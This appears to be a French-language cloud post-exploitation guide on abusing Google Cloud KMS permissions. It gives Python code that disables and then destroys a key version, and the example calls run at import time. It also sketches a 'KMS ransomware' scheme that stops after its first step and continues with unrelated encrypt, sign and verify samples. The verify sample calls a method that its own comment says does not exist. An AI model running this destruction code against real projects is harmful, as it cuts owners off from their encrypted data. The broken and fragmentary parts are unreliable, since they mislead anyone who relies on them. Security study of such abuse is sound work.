Un attaquant disposant de cette autorisation pourrait détruire une version de clé KMS. Pour ce faire, vous devez d'abord désactiver la version de la clé, puis la détruire :
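# pip install google-cloud-kms
from google.cloud import kms


def disable_key_version(project_id, location_id, key_ring_id, key_id, key_version):
    """Disable a key version in Cloud KMS.

    Args:
        project_id: GCP project that owns the key ring.
        location_id: KMS location of the key ring.
        key_ring_id: Key ring containing the key.
        key_id: Crypto key whose version is being disabled.
        key_version: Version number of the key, as a string (e.g. ``'1'``).

    Returns:
        The updated ``CryptoKeyVersion`` resource returned by the API.

    Raises:
        google.api_core.exceptions.GoogleAPICallError: if the API call fails
        (for example when the caller lacks permission to update the version).
    """
    # Create the client.
    client = kms.KeyManagementServiceClient()

    # Build the fully qualified key version name.
    key_version_name = client.crypto_key_version_path(
        project_id, location_id, key_ring_id, key_id, key_version
    )

    # The update is PATCH-style and requires an update_mask listing the fields
    # being changed; without it the request is rejected as invalid.
    request = {
        'crypto_key_version': {
            'name': key_version_name,
            'state': kms.CryptoKeyVersion.State.DISABLED,
        },
        'update_mask': {'paths': ['state']},
    }

    # Disabling is reversible (the state can be set back to ENABLED) and the
    # call is recorded in Cloud Audit Logs.
    return client.update_crypto_key_version(request=request)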
def destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version):
    """Schedule a Cloud KMS key version for destruction.

    Args:
        project_id: GCP project that owns the key ring.
        location_id: KMS location of the key ring.
        key_ring_id: Key ring containing the key.
        key_id: Crypto key whose version is being destroyed.
        key_version: Version number of the key, as a string (e.g. ``'1'``).

    Returns:
        None.
    """
    kms_client = kms.KeyManagementServiceClient()
    target = kms_client.crypto_key_version_path(
        project_id, location_id, key_ring_id, key_id, key_version
    )
    # The version moves to DESTROY_SCHEDULED rather than being wiped at once;
    # until the scheduled time it can be recovered with
    # restore_crypto_key_version, and the call is recorded in Cloud Audit Logs.
    kms_client.destroy_crypto_key_version(request=dict(name=target))


# Example usage -- note that these calls run at import time with the
# placeholder values below.
project_id, location_id, key_ring_id, key_id = (
    'your-project-id',
    'your-location',
    'your-key-ring',
    'your-key-id',
)
key_version = '1'  # Version number to disable and destroy

# A version must be disabled before it can be destroyed.
disable_key_version(project_id, location_id, key_ring_id, key_id, key_version)
destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version)
Rançongiciel KMS
Sur AWS, il est possible de voler complètement une clé KMS en modifiant la politique de ressource KMS et en n'autorisant que le compte de l'attaquant à utiliser la clé. Comme ces politiques de ressource n'existent pas dans GCP, cela n'est pas possible.
Cependant, il existe une autre façon d'effectuer un rançongiciel KMS global, qui impliquerait les étapes suivantes :
Créer une nouvelle version de la clé avec un matériel de clé importé par l'attaquant
from google.cloud import kms
import base64


def encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext):
    """Encrypt *plaintext* with a symmetric Cloud KMS key.

    Args:
        project_id: GCP project that owns the key ring.
        location_id: KMS location of the key ring.
        key_ring_id: Key ring containing the key.
        key_id: Symmetric crypto key used for encryption.
        plaintext: Text to encrypt; encoded as UTF-8 before the call.

    Returns:
        The ciphertext returned by KMS, base64-encoded, as ``bytes``.
    """
    kms_client = kms.KeyManagementServiceClient()
    key_name = kms_client.crypto_key_path(project_id, location_id, key_ring_id, key_id)

    request = {
        'name': key_name,
        'plaintext': plaintext.encode('utf-8'),
    }
    response = kms_client.encrypt(request=request)

    # Base64 keeps the raw ciphertext bytes printable and easy to store as text.
    return base64.b64encode(response.ciphertext)


# Example usage
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
plaintext = 'your-data-to-encrypt'

ciphertext = encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext)
print('Ciphertext:', ciphertext)
cloudkms.cryptoKeyVersions.useToSign
import hashlib
from google.cloud import kms


def sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message):
    """Sign *message* with an asymmetric Cloud KMS key version.

    Args:
        project_id: GCP project that owns the key ring.
        location_id: KMS location of the key ring.
        key_ring_id: Key ring containing the key.
        key_id: Asymmetric signing key.
        key_version: Version number of the key, as a string (e.g. ``'1'``).
        message: Text to sign; hashed with SHA-256 before the call.

    Returns:
        The raw signature bytes from the API response.
    """
    kms_client = kms.KeyManagementServiceClient()
    version_name = kms_client.crypto_key_version_path(
        project_id, location_id, key_ring_id, key_id, key_version
    )

    # KMS signs a digest rather than the message itself; the digest type
    # (SHA-256 here) has to correspond to the key version's algorithm --
    # confirm against the key's configuration.
    sha256_digest = hashlib.sha256(message.encode('utf-8')).digest()

    response = kms_client.asymmetric_sign(
        name=version_name, digest={'sha256': sha256_digest}
    )
    return response.signature


# Example usage for signing
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1'
message = 'your-message'

signature = sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message)
print('Signature:', signature)
cloudkms.cryptoKeyVersions.useToVerify
cloudkms.cryptoKeyVersions.useToVerify
from google.cloud import kms
import hashlib


def verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature):
    """Verify *signature* over *message* for an asymmetric Cloud KMS key version.

    Args:
        project_id: GCP project that owns the key ring.
        location_id: KMS location of the key ring.
        key_ring_id: Key ring containing the key.
        key_id: Asymmetric signing key.
        key_version: Version number of the key, as a string (e.g. ``'1'``).
        message: Text that was signed; hashed with SHA-256 before the call.
        signature: Signature bytes to check.

    Returns:
        The ``success`` field of the API response.
    """
    kms_client = kms.KeyManagementServiceClient()
    version_name = kms_client.crypto_key_version_path(
        project_id, location_id, key_ring_id, key_id, key_version
    )

    # Same digest construction as the signing side.
    sha256_digest = hashlib.sha256(message.encode('utf-8')).digest()

    # NOTE(review): KeyManagementServiceClient does not appear to expose an
    # asymmetric_verify method. Cloud KMS verifies asymmetric signatures
    # client-side against the key version's public key (get_public_key);
    # the server-side verify call (mac_verify) is for MAC keys. Confirm
    # against the SDK before relying on this call.
    response = kms_client.asymmetric_verify(
        name=version_name, digest={'sha256': sha256_digest}, signature=signature
    )
    return response.success


# Example usage for verification -- relies on the variables assigned in the
# signing example above.
verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature)
print('Verified:', verified)